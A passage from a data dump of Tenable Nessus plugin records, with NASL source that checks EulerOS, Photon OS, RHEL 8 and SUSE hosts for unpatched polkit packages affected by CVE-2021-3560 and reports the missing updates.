script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n 
\"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:38", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Polkit PHSA-2021-3.0-0248", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0248_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150286", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0248. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150286);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 3.0: Polkit PHSA-2021-3.0-0248\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-248.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'polkit-0.116-2.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'polkit-devel-0.116-2.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:18", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2021:2237 advisory.\n\n - polkit: local 
privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "RHEL 8 : polkit (RHSA-2021:2237)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:rhel_aus:8.2", "cpe:/o:redhat:rhel_e4s:8.2", "cpe:/o:redhat:rhel_eus:8.2", "cpe:/o:redhat:rhel_tus:8.2", "p-cpe:/a:redhat:enterprise_linux:polkit", "p-cpe:/a:redhat:enterprise_linux:polkit-devel", "p-cpe:/a:redhat:enterprise_linux:polkit-docs", "p-cpe:/a:redhat:enterprise_linux:polkit-libs"], "id": "REDHAT-RHSA-2021-2237.NASL", "href": "https://www.tenable.com/plugins/nessus/150161", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2237. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150161);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RHSA\", value:\"2021:2237\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 8 : polkit (RHSA-2021:2237)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:2237 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2237\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_cwe_id(863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-libs\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.2')) audit(AUDIT_OS_NOT, 'Red Hat 8.2', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.2/x86_64/appstream/debug',\n 'content/aus/rhel8/8.2/x86_64/appstream/os',\n 'content/aus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.2/x86_64/baseos/debug',\n 'content/aus/rhel8/8.2/x86_64/baseos/os',\n 'content/aus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/appstream/debug',\n 'content/e4s/rhel8/8.2/ppc64le/appstream/os',\n 'content/e4s/rhel8/8.2/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/baseos/debug',\n 'content/e4s/rhel8/8.2/ppc64le/baseos/os',\n 'content/e4s/rhel8/8.2/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/highavailability/debug',\n 'content/e4s/rhel8/8.2/ppc64le/highavailability/os',\n 
'content/e4s/rhel8/8.2/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel8/8.2/ppc64le/sap-solutions/os',\n 'content/e4s/rhel8/8.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/sap/debug',\n 'content/e4s/rhel8/8.2/ppc64le/sap/os',\n 'content/e4s/rhel8/8.2/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.2/x86_64/appstream/os',\n 'content/e4s/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.2/x86_64/baseos/os',\n 'content/e4s/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap/os',\n 'content/e4s/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/appstream/debug',\n 'content/eus/rhel8/8.2/aarch64/appstream/os',\n 'content/eus/rhel8/8.2/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/baseos/debug',\n 'content/eus/rhel8/8.2/aarch64/baseos/os',\n 'content/eus/rhel8/8.2/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/codeready-builder/debug',\n 'content/eus/rhel8/8.2/aarch64/codeready-builder/os',\n 'content/eus/rhel8/8.2/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/highavailability/debug',\n 'content/eus/rhel8/8.2/aarch64/highavailability/os',\n 'content/eus/rhel8/8.2/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/supplementary/debug',\n 'content/eus/rhel8/8.2/aarch64/supplementary/os',\n 'content/eus/rhel8/8.2/aarch64/supplementary/source/SRPMS',\n 
'content/eus/rhel8/8.2/ppc64le/appstream/debug',\n 'content/eus/rhel8/8.2/ppc64le/appstream/os',\n 'content/eus/rhel8/8.2/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/baseos/debug',\n 'content/eus/rhel8/8.2/ppc64le/baseos/os',\n 'content/eus/rhel8/8.2/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/codeready-builder/debug',\n 'content/eus/rhel8/8.2/ppc64le/codeready-builder/os',\n 'content/eus/rhel8/8.2/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/highavailability/debug',\n 'content/eus/rhel8/8.2/ppc64le/highavailability/os',\n 'content/eus/rhel8/8.2/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/resilientstorage/debug',\n 'content/eus/rhel8/8.2/ppc64le/resilientstorage/os',\n 'content/eus/rhel8/8.2/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/sap-solutions/debug',\n 'content/eus/rhel8/8.2/ppc64le/sap-solutions/os',\n 'content/eus/rhel8/8.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/sap/debug',\n 'content/eus/rhel8/8.2/ppc64le/sap/os',\n 'content/eus/rhel8/8.2/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/supplementary/debug',\n 'content/eus/rhel8/8.2/ppc64le/supplementary/os',\n 'content/eus/rhel8/8.2/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/appstream/debug',\n 'content/eus/rhel8/8.2/s390x/appstream/os',\n 'content/eus/rhel8/8.2/s390x/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/baseos/debug',\n 'content/eus/rhel8/8.2/s390x/baseos/os',\n 'content/eus/rhel8/8.2/s390x/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/codeready-builder/debug',\n 'content/eus/rhel8/8.2/s390x/codeready-builder/os',\n 'content/eus/rhel8/8.2/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/highavailability/debug',\n 'content/eus/rhel8/8.2/s390x/highavailability/os',\n 'content/eus/rhel8/8.2/s390x/highavailability/source/SRPMS',\n 
'content/eus/rhel8/8.2/s390x/resilientstorage/debug',\n 'content/eus/rhel8/8.2/s390x/resilientstorage/os',\n 'content/eus/rhel8/8.2/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/sap/debug',\n 'content/eus/rhel8/8.2/s390x/sap/os',\n 'content/eus/rhel8/8.2/s390x/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/supplementary/debug',\n 'content/eus/rhel8/8.2/s390x/supplementary/os',\n 'content/eus/rhel8/8.2/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/appstream/debug',\n 'content/eus/rhel8/8.2/x86_64/appstream/os',\n 'content/eus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/baseos/debug',\n 'content/eus/rhel8/8.2/x86_64/baseos/os',\n 'content/eus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.2/x86_64/highavailability/os',\n 'content/eus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap/debug',\n 'content/eus/rhel8/8.2/x86_64/sap/os',\n 'content/eus/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.2/x86_64/supplementary/os',\n 'content/eus/rhel8/8.2/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/appstream/debug',\n 'content/tus/rhel8/8.2/x86_64/appstream/os',\n 'content/tus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/baseos/debug',\n 
'content/tus/rhel8/8.2/x86_64/baseos/os',\n 'content/tus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.2/x86_64/highavailability/os',\n 'content/tus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/nfv/debug',\n 'content/tus/rhel8/8.2/x86_64/nfv/os',\n 'content/tus/rhel8/8.2/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/rt/debug',\n 'content/tus/rhel8/8.2/x86_64/rt/os',\n 'content/tus/rhel8/8.2/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) 
rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Advanced Update Support, Extended Update Support, Telco Extended Update Support or Update Services for SAP Solutions repositories.\\n' +\n 'Access to these repositories requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = subscription_caveat + rpm_report_get() + redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:51:52", "description": "This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : polkit (SUSE-SU-2021:1843-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpolkit0", "p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo", "p-cpe:/a:novell:suse_linux:polkit", "p-cpe:/a:novell:suse_linux:polkit-debuginfo", "p-cpe:/a:novell:suse_linux:polkit-debugsource", "p-cpe:/a:novell:suse_linux:polkit-devel", "p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-polkit", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-1843-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:1843-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150257);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : polkit (SUSE-SU-2021:1843-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly 
from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20211843-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8bbd1370\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE MicroOS 5.0 :\n\nzypper in -t patch SUSE-SUSE-MicroOS-5.0-2021-1843=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP3 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2021-1843=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-1843=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n 